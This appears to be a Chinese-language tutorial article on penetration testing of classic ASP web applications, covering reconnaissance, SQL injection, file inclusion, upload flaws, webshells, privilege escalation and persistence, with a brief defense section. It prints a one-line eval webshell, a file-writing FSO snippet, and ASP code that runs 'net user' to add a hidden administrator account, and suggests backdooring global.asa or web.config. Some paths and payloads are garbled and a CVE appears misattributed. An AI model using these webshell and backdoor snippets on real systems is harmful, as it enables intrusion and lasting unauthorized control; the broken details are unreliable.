ASP渗透概述
ASP(Active Server Pages)是一种经典的Web开发技术,广泛应用于老旧系统中,由于其安全设计上的局限性,ASP应用常成为渗透测试的目标,本文将从信息收集、漏洞利用、权限提升、持久化控制等方面,系统介绍ASP渗透的技术要点与防范措施。

信息收集阶段
信息收集是渗透测试的基础,需全面掌握目标ASP应用的架构、技术栈及漏洞点。
1 架构识别
通过以下方式识别ASP应用特征:

- HTTP头分析:检查
Server、X-Powered-By等字段,若显示Microsoft-IIS/6.0或ASP.NET,则可能为ASP环境。 - 文件扩展名:常见
.asp、.asa、.cer(可执行脚本)等文件。 - 目录扫描:使用
DirBuster或gobuster扫描/admin、/bak等敏感目录。
2 子域名与端口扫描
- 工具:
Sublist3r、Amass收集子域名;Nmap扫描端口(如80、443、8172等IIS管理端口)。 - 指纹识别:通过
Wappalyzer或WhatWeb确认ASP技术栈。
3 漏洞情报收集
- 搜索引擎:使用
Google Dork语法(如inurl:.asp?id=)挖掘SQL注入点。 - 公开漏洞库:查询
CVE、Exploit-DB中针对IIS、ASP的已知漏洞(如CVE-2017-7269)。
漏洞利用阶段
ASP应用的漏洞多集中在代码逻辑、配置错误及组件滥用上。
1 经典漏洞类型
| 漏洞类型 | 利用方式 | 案例 |
|---|---|---|
| SQL注入 | 通过、union select等构造payload,获取数据库信息。 | http://target.com/news.asp?id=1 |
| 文件包含 | 本地/远程文件包含(LFI/RFI),读取c:boot.ini或远程Webshell。 | ?page=......windowswin.ini |
| 上传漏洞 | 绕过黑名单上传.asp或.cer文件,获取Webshell。 | 未校验文件头的上传接口。 |
| IIS短文件名 | 利用~1截断遍历目录,猜测敏感文件名(如admin~1.asp)。 | 需目标开启8.3短文件名支持。 |
2 Webshell获取
- 一句话木马:上传
<%eval request("cmd")%>,配合中国菜刀或蚁剑连接。 - 组件利用:若存在
FSO(FileSystemObject),可执行命令:<% Set obj = Server.CreateObject("Scripting.FileSystemObject") Set file = obj.OpenTextFile("c:test.txt", 2, True) file.WriteLine "Hacked" file.Close %>
权限提升与持久化
1 权限提升
- 系统信息收集:通过
<%response.servervariables("SERVER_SOFTWARE")%>获取IIS版本。 - 利用提权漏洞:如
CVE-2019-1405(IIS 6.0权限提升)或AlwaysInstallElevated策略。
2 持久化控制
- 添加管理员账户:写入VBS脚本创建用户:
<% Set shell = Server.CreateObject("WScript.Shell") shell.run "net user hacker P@ssw0rd /add" shell.run "net localgroup administrators hacker /add" %> - 后门植入:修改
global.asa或web.config,添加恶意脚本。
安全防护建议
- 代码审计:使用
D盾或Fortify扫描ASP代码,过滤特殊字符。 - 配置加固:
- 禁用父路径(
Parent Paths设为False)。 - 限制
Scripting.FileSystemObject组件权限。
- 禁用父路径(
- 输入验证:对所有输入参数进行白名单过滤,避免SQL注入。
- 及时更新:修补IIS及ASP.NET的已知漏洞(如KB4499760)。
FAQs
Q1: 如何判断目标是否为ASP应用?
A1: 可通过以下方式综合判断:

- HTTP响应头中包含
ASP.NET或Microsoft-IIS标识; - 文件扩展名为
.asp、.aspx; - 使用
file命令检测文件类型(如file test.asp输出为ASCII text)。
Q2: ASP渗透中如何防御文件包含漏洞?
A2: 防御措施包括:
- 禁用
enableParentPaths配置; - 使用绝对路径而非;
- 对包含的文件进行严格白名单校验,避免动态拼接路径。
【版权声明】:本站所有内容均来自网络,若无意侵犯到您的权利,请及时与我们联系将尽快删除相关内容!
发表回复